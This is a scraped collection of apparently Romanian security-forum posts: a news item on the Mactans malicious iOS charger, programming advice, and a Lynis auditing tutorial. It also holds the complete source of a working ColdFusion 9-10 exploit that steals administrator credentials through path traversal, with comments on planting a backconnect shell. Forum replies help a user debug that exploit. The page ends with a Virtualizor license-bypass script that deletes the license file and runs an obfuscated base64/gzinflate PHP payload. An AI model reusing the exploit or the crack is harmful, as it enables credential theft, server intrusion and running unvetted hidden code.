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Forget obscure apps, unexpected emails and suspicious links. A group of researchers from the Georgia Institute of Technology claim to have developed a new smartphone charger that can install malware on almost any Apple device running the latest version of iOS. Billy Lau, Yeongjin Jang and Chengyu Song are expected to debut the charger at Black Hat, a long-running security conference to be held in Las Vegas this July and August. A summary of their presentation states that they will be able to demonstrate how an iOS device can be compromised less than a minute after plugging in a malicious charger. “To demonstrate practical application of these vulnerabilities, we built a proof of concept malicious charger, called Mactans, using a BeagleBoard,” the group explains. “This hardware was selected to demonstrate the ease with which innocent-looking, malicious USB chargers can be constructed. While Mactans was built with limited amount of time and a small budget, we also briefly consider what more motivated, well-funded adversaries could accomplish.” The researchers appear to have discovered a major weakness in the defences of Apple’s popular mobile operating system. The trio don’t have malicious intentions, however. Jang told a reporter at Forbes that he had already contacted Apple about the exploit. During the presentation they will also recommend ways in which users can protect their devices moving forward. Evidence of the charger is yet to surface, so it’s unclear exactly what it looks like and if it bears any resemblance to an official charger built by Apple. Nevertheless, there is already an abundance of safe third-party chargers available for purchase, so even a half-decent effort should raise a few eyebrows from the audience. Apple is yet to recognize the findings of the group, but any potential scenario whereby an iPhone or iPad is compromised using its USB connection should be high on the company’s priorities. As always, think twice about borrowing anything that can connect with your personal devices. Especially suspicious-looking chargers, it would seem. Sursa
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M2G replied to GarryOne's topic in Programare
Bravo insa nu-mi place ca $until e o constanta. Seteaza-ti un interval mai mare, sa zicem 100 000 si faci ecel for pana la acea valoare. La fiecare iteratie verifici daca ai o carte pe pagina. Sa zicem ca verifici daca $filename contine ceva. Daca nu contine iesi din bucla. Mai simplu faci asta cu un while si conditia de stop sa fie gasirea unui anumit element pe pagina. Astfel o sa poti sa downloadezi cand ai chef fara sa modifici scriptul manual si sa cauti de fiecare data care e numarul maxim din acel URL. Un dezavantaj aici ar fi ca daca se intampla ceva si numerele nu sunt consecutive, o sa crape. Nu o sa mearga pana la sfarsit. Daca toate sunt consecutive si nu exista o discontinuitate, e mai bine asa. Nu mai trebuie intretinut codul. Ar fi util sa faci si o verificare pe hdd sa vezi daca ai deja acel fisier, in cazul in care se adauga carti noi sa le scoti doar pe acelea si cu cele vechi sa nu mai ai treaba. -
Dealoci memoria si in momentul in care esti la etajul curent. Sau folosesti SCADE si iti faci un automat din specificatii. Codul generat va fi garantat ca nu contine memory leaks si buffer overflows. Cod SIL4. Definesti o stare idle in care liftul nu face nimic. Cand ai ajuns in starea aceea dealoci memoria. Faci un modul de diagnoza si salvezi stari la anumite momente de timp. Cand ai detectat un caz exceptional, revii la acel checkpoint. Folosesti garbage collection daca dispui de un astfel de sistem. Folosesti librarii STL daca scrii C++. Nu am inteles la ce te referi prin "etaje de urgenta". Daca te referi la accesul autoritatilor poti avea o anumita cheie in lift si in momentul in care este actionata, liftul intra intr-o stare privilegiata si urmeaza un set de reguli definit in astfel de sitatii ignorand alte comenzi exterioare si trecand din starea curenta direct in starea privilegiata. (ex. cineva urca la etajul 20. Autoritatile cheama liftul la parter. Liftul se opreste, incepe sa coboare ignorand starea precedenta.) In fine, ideea la memory leak este sa dealoci tot timpul ce ai alocat manual. Daca scrii in C++, la fiecare new trebuia sa fie un delete. La fiecare malloc, un free etc... Astea depind de experienta programatorului, daca uita sa le puna sau nu.
In romana: TOTUL DESPRE C SI C++ (MANUALUL FUNDAMENTAL IN C SI C++).pdf Liviu Negrescu - Limbajele C si C++ pentru incepatori vol 1 + 2.rar
Banal? Era sa cad de pe scaun. Oricum ma indoiesc ca la un asemenea sistem a folosit C++ si nu C. Ma gandesc ca a programat un microcontroller care prelucra datele de la niste senzori. Nu e rocket science dar nici banal nu e. Ontopic: @Eustatiu Eu iti recomand astea: Stroustrup: The C++ Programming Language (Third Edition) Effective C++: 55 Specific Ways to Improve Your Programs and Designs (3rd Edition): Scott Meyers: 9780321334879: Amazon.com: Books Bruce Eckel's MindView, Inc: Thinking in C++ 2nd Edition by Bruce Eckel Download: C++ Books.rar
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Pai ai bucla for path in tests: lfidata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=%s&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target,path)).content if "encrypted=true" in lfidata: credzacquired = True print "[*] CF Administrator credentials acquired:" print lfidata else: pass Ai acolo un requests.get, http://docs.python-requests.org/en/latest/user/quickstart.html#make-a-request Te uiti in documentatie sa vezi ce face toata sintaxa aia din script. Mai jos iti ferifica daca gaseste stringul "encrypted=true" in pagina returnata de request.get. Daca stringul este gasit, iti declara variabila credzacquired la TRUE si le printeaza credentialele adica ceea ce contine lfidata. Mai jos este doar un text de showoff, printeaza niste stringuri "SUB ZERO WINS" etc. Ca sa vezi ce se intampla poti sa stergi liniile de la 176 in jos ca sa nu mai dea eroare sau poti declara variabila credzacquired mai sus de bucla for ca sa fie in scope-ul if-ului de mai jos. Daca nu ti-a intrat in acea bucla cred ca altceva e problema. Fa putin debuging. pune un print path chiar urmatoarea linie dupa for path in tests: ca sa vezi ce intrari ai in lista tests. Mai poti pune un print lfidata in bucla else ca sa vezi ca contine lfidata in cazul in care nu gaseste "encrypted=true" in lfidata
Nu ai instalat modulul requests, dupa cum spune si eroarea. Sursa Modul: https://github.com/kennethreitz/requests Modul: https://pypi.python.org/pypi/requests
Lynis is an auditing tool for unix/linux like systems which is used to scan the entire unix/linux systems for security issues, installed software informations, general system information, configuration issues or mistakes, software patch management, malware and vulnerability, firewall auditing, user accounts without passwords, invalid file permissions and many more. This tool is quite often used for novice system administrators, system auditors, network and security specialists. The notable feature of this tool is easy to use and it tests and gathers the linux systems security informations in few minutes. Sounds good, why don’t you give it a try? Install lynis in Ubuntu / Debian Distros Installation is quite easy in ubuntu/debian like systems. You can install it either from synaptic manager or from terminal. For other distros plaese check offical homepage. unixmen@server:~$ sudo apt-get install lynis Usage and Run lynis The running and using of lynis is faily simple. All you need to do is just open the terminal and type following command. unixmen@server:~$ sudo lynis -c or unixmen@server:~$ sudo lynis --check-all Now lynis will begin to audit the entire system including the following: Boot loaders and startup services. kernel configuration, core dumps, run level and loaded modules. Memory and processes. Users and groups. mount points, /tmp files and root file system NFS and BIND services. Update/upgradeable packages and software repositories. Iptables and SElinux issues/configurations. Apache and nginx web servers. SSH configurations and Issues. MySQL root password and LDAP services. php options. crontab/cronjob and atd. ntp daemon. SSL certificate expiration and Issues. malwares. Home directories. The following output will open when you type above commands. Now pressing enter will lead you through the next screens. To stop asking “Press Enter” every time, use the parameters ‘-c and -Q’ as shown below. unixmen@server:~$ sudo lynis -c -Q After completing the scanning, it will generate a output report in ‘/var/log/lynis.log’ file. unixmen@server:~$ sudo vi /var/log/lynis.log [13:13:13] ### Starting Lynis 1.3.0 with PID 4356, build date 28 April 2011 ### [13:13:13] ### Copyright 2007-2012 - Michael Boelen, http://www.rootkit.nl/ ### [13:13:13] Program version: 1.3.0 [13:13:13] Operating system: Linux [13:13:13] Operating system name: Ubuntu [13:13:13] Operating system version: 12.10 [13:13:13] Kernel version: 3.5.0-17-generic [13:13:13] Hardware platform: i686 [13:13:13] Hostname: server [13:13:13] Auditor: [Unknown] [13:13:13] Profile: /etc/lynis/default.prf [13:13:13] Log file: /var/log/lynis.log [13:13:13] Report file: /var/log/lynis-report.dat [13:13:13] Report version: 1.0 [13:13:13] ----------------------------------------------------- [13:13:13] Include directory: /usr/share/lynis/include [13:13:13] Plugin directory: /etc/lynis/plugins [13:13:13] Database directory: /usr/share/lynis/db [13:13:13] ===---------------------------------------------------------------=== [13:13:13] Reading profile/configuration /etc/lynis/default.prf [13:13:13] Profile option set: profile_name (with value Default Audit Template) [13:13:13] Profile option set: pause_between_tests (with value 0) [13:13:14] Profile option set: show_tool_tips (with value 1) You can scroll down through the log file for any Warnings or Suggestions or use the following commands to view the ‘Warnings’ and ‘Suggestions’ found in the log file. To list out the ‘Warnings’, use the following command: unixmen@server:~$ sudo grep Warning /var/log/lynis.log [13:14:10] Warning: Found BIND version in banner [test:NAME-4210] [impact:M] [13:18:43] Warning: Couldn't find 2 responsive nameservers [test:NETW-2705] [impact:L] [13:18:47] Warning: Found mail_name in SMTP banner, and/or mail_name contains 'Postfix' [test:MAIL-8818] [impact:L] [13:19:02] Warning: Root can directly login via SSH [test:SSH-7412] [impact:M] [13:19:06] Warning: PHP option register_globals option is turned on, which can be a risk for variable value overwriting [test:PHP-2368] [impact:M] [13:19:06] Warning: PHP option expose_php is possibly turned on, which can reveal useful information for attackers. [test:PHP-2372] [impact:M] [13:19:30] Warning: No running NTP daemon or available client found [test:TIME-3104] [impact:M] To list out the ‘Suggestions’, use the following command: unixmen@server:~$ sudo grep Suggestion /var/log/lynis.log [13:13:57] Suggestion: Install a PAM module for password strength testing like pam_cracklib or pam_passwdqc [test:AUTH-9262] [13:13:59] Suggestion: When possible set expire dates for all password protected accounts [test:AUTH-9282] [13:13:59] Suggestion: Configure password aging limits to enforce password changing on a regular base [test:AUTH-9286] [13:14:00] Suggestion: Default umask in /etc/profile could be more strict like 027 [test:AUTH-9328] [13:14:00] Suggestion: Default umask in /etc/login.defs could be more strict like 027 [test:AUTH-9328] [13:14:00] Suggestion: Default umask in /etc/init.d/rc could be more strict like 027 [test:AUTH-9328] [13:14:02] Suggestion: To decrease the impact of a full /home file system, place /home on a separated partition [test:FILE-6310] [13:14:02] Suggestion: To decrease the impact of a full /tmp file system, place /tmp on a separated partition [test:FILE-6310] [13:14:05] Suggestion: Disable drivers like USB storage when not used, to prevent unauthorized storage or data theft [test:STRG-1840] [13:14:06] Suggestion: Disable drivers like firewire storage when not used, to prevent unauthorized storage or data theft [test:STRG-1846] [13:18:42] Suggestion: Install package apt-show-versions for patch management purposes [test:PKGS-7394] [13:18:43] Suggestion: Check your resolv.conf file and fill in a backup nameserver if possible [test:NETW-2705] [13:18:47] Suggestion: You are adviced to hide the mail_name (option: smtpd_banner) from your postfix configuration. Use postconf -e or change your main.cf file (/etc/postfix/main.cf) [test:MAIL-8818] [13:18:50] Suggestion: Configure a firewall/packet filter to filter incoming and outgoing traffic [test:FIRE-4590] [13:19:06] Suggestion: Change the register_globals line to: register_globals = Off [test:PHP-2368] [13:19:07] Suggestion: Change the expose_php line to: expose_php = Off [test:PHP-2372] [13:19:07] Suggestion: Change the allow_url_fopen line to: allow_url_fopen = Off, to disable downloads via PHP [test:PHP-2376] [13:19:26] Suggestion: Add legal banner to /etc/issue, to warn unauthorized users [test:BANN-7126] [13:19:27] Suggestion: Add legal banner to /etc/issue.net, to warn unauthorized users [test:BANN-7130] [13:19:29] Suggestion: Enable auditd to collect audit information [test:ACCT-9628] [13:19:30] Suggestion: Check if any NTP daemon is running or a NTP client gets executed daily, to prevent big time differences and avoid problems with services like kerberos, authentication or logging differences. [test:TIME-3104] [13:19:36] Suggestion: Install a file integrity tool [test:FINT-4350] [13:19:51] Suggestion: One or more sysctl values differ from the scan profile and could be tweaked [test:KRNL-6000] [13:19:52] Suggestion: Harden the system by installing one or malware scanners to perform periodic file system scans [test:HRDN-7230] Thats it. Now you can rectify the security loopholes even if you are unexperienced system administrator in your Unix/Linux systems. Sursa
#!/usr/bin/env python # -*- coding: utf-8 -*- intro=""" _ _ _______ _____ _ _ _______ Cold ,''' Fusion |_____| | |_____] \ / |______ Cold ,''' /-- Fusion | | | | \/ ______|. Cold -,__,' Fusion Name : ColdSub-Zero.pyFusion v2 Description : CF9-10 Remote Root Zeroday Crew : HTP """ cyan = "\x1b[1;36m" red = "\x1b[1;31m" clear = "\x1b[0m" print intro.replace("Cold",cyan).replace("Fusion",clear) import requests, time, sys, urllib, hashlib def flash(color,text,times): sys.stdout.write(text) line1 = "\x0d\x1b[2K%s%s" % (color,text) line2 = "\x0d\x1b[2K%s%s" % (clear,text) for x in range(0,times): sys.stdout.write(line1) sys.stdout.flush() time.sleep(.2) sys.stdout.write(line2) sys.stdout.flush() time.sleep(.2) print line2 abspath = "" operatingsystem = "refrigerator" coldfusion = 0 def fingerprintcf(protocol,target): # Fingerprint using md5's of CF 9/10 admin image print "[*] Fingerprinting CF 9/10 instance" imgdata = requests.get("%s://%s/CFIDE/administrator/images/loginbackground.jpg" % (protocol,target)).content md5fingerprint = hashlib.md5(imgdata).hexdigest() if md5fingerprint == "a4c81b7a6289b2fc9b36848fa0cae83c": print "[*] Detected ColdFusion 10" return 10 elif md5fingerprint == "596b3fc4f1a0b818979db1cf94a82220": print "[*] Detected ColdFusion 9" return 9 elif md5fingerprint == "779efc149954677095446c167344dbfc": # ColdFusion 8 doesn't have mail.cfm, but it is still exploitable due to l10n parsing the template as CFM. # It would require shell data to be on the box to include, such as an uploaded 'picture' or what-not. print "[*] Requires inclusion: m4ke your 0wn fuq1ng z3r0d4y!" sys.exit(0) else: print "[*] Unable to fingerprint, continuing with little environment data" return None def getpath(protocol,target): # Leverage a path disclosure to get the absolute path on CF9-10 print "[*] Testing for path disclosure" abspathdata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).headers if "set-cookie" in abspathdata.keys(): try: abspath = urllib.unquote(abspathdata['set-cookie'].split('ANALYZER_DIRECTORY=')[1].split(';')[0]) print "[*] Absolute path obtained: %s" % abspath if abspath[0] == "/": print "[*] Detected Linux" operatingsystem = "linux" elif abspath[1] == ":": print "[*] Detected Windows" operatingsystem = "windows 95 with bonzibuddy" else: print "[?] t4rg3t 4pp34r5 t0 b3 runn1n9 0n 4 r3fr1g3r4t0r" operatingsystem = "refrigerator" except: print "[?] OS detection failure. Continuing with fingerprint." else: print "[?] OS detection failure. Continuing with fingerprint." return abspath,operatingsystem # HTP '13 # Congratulations, you're reading the source. # # Subzero v2 is a do-it-yourself Subzero v1. Some details have been provided throughout the source hinting at the potential usage. # As far as changes, the Null RDS 1day has been removed, as well as the locale + FCKEditor exploitation checks & auth bypass + shell drop. # If you know what you are doing, this 0day can be used in conjunction with the other 0days to exploit ColdFusion 6-10. (aka everything). # # ColdFusion 6 can be taken out with the locale 0day, and XORing password.properties against the stored private key will yield the actual # login password. # # Since you're reading the source, we'll give you another 0day to improve Subzero. Once Subzero has extracted the hash, use scheduled tasks # to store your backconnect shell in a temp directory (such as the CF temp directory/windows TEMP dir or /dev/shm). Then, use Server Settings # > Settings in the CF admin to load it as the Missing Template Handler (you can travel upwards from the 'relative path' using ../). Finally, # trigger a 404 to recieve your backconnect, and restore the Missing Template Handler. We might release fUZE Shell v2 in the future for POCs # of this written in CFML. # # For anyone looking to fully weaponize Subzero into direct RXE for ColdFusion 10, we'll give you a hint. Subzero is a LFI, not a LFD. # (preinstalled *.cfm) target = raw_input("Target> ") if "https" in target: protocol = "https" target = target.replace("http://","").replace("https://","").split("/")[0] print "[*] Target set to: %s" % target print "[*] HTTPS: Enabled" else: protocol = "http" target = target.replace("http://","").replace("https://","").split("/")[0] print "[*] Target set to: %s" % target abspath,operatingsystem = getpath(protocol,target) coldfusion = fingerprintcf(protocol,target) print "[*] Collecting additional data about operating system" etchosts = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../etc/hosts&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).content bootini = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../boot.ini&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).content if "hosts" in etchosts or "" in etchosts: operatingsystem = "linux" elif "[boot loader]" in bootini or "[operating systems]" in bootini: operatingsystem = "windows 95 with bonzibuddy" elif operatingsystem is "linux" or "windows 95 with bonzibuddy": pass else: operatingsystem = "refrigerator" if operatingsystem is "refrigerator": print "[*] go0d 1uq!!" print "[*] Obtaining credentials" tests = ["../../lib/password.properties","..\..\lib\password.properties"] if operatingsystem is "windows 95 with bonzibuddy": if coldfusion == 10: tests += ["..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties", "..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties", "..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"] elif coldfusion == 9: tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties", "..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties", "..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"] else: tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties", "..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties", "..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties", "..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties", "..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"] elif operatingsystem is "linux": if coldfusion == 10: tests += ["../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties", "../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"] elif coldfusion == 9: tests += ["../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties", "../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"] else: tests += ["../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties", "../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties", "../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"] elif operatingsystem is "refrigerator": # w3lp l00ks l1k3 w3 g0tt4 5h0tguN th1s sh1t tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties", "..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties", "..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties", "..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties", "..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties", "../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties", "../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties", "../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"] for path in tests: lfidata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=%s&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target,path)).content if "encrypted=true" in lfidata: credzacquired = True print "[*] CF Administrator credentials acquired:" print lfidata else: pass if credzacquired == True: flash(cyan,"[~] SUB ZERO WINS",3) time.sleep(.5) flash(red,"[!] FLAWLESS VICTORY",3) time.sleep(.5) else: flash(red,"[!] COLDFUSION ADMIN WINS",3) time.sleep(.5) # e0f HTP '13 Nu am citit intreg codul dar la un momentdat face niste verificari pe /CFIDE/administrator/images/loginbackground.jpg" si ii ia hash-ul MD5 pentru a determina versiunea 8, 9 10. Ca un workaround, puteti sa schimbati cativa pixeli din poza aceea pentru a genera un hash diferit astfel ca versiunea sa nu poata fi descoperita prin tehnica asta. Defapt coldfusion = fingerprintcf(protocol,target) pune in variabila coldfusion versiunea gasita pe care o foloseste mai departe. Daca schimbati cativa pixeli din acea poza, functia o sa returneze None de fiecare data si exploitul nu mai poate sa fie folosit. Corectati-ma daca gresesc. ColdFusion 9-10 - Credential Disclosure Exploit
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adf.ly links are not allowed here. Removed. Aici e continutul arhivei: INSTRUCTIONS.txt virtualizor.sh #!/bin/bash yum install php -y chattr -i /usr/local/virtualizor/license.php rm -rf /usr/local/virtualizor/license.php php_cwd=`/usr/bin/php << EOF <?php eval(gzinflate(base64_decode('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MM6wLGNeBqYx3RgTzYbbUU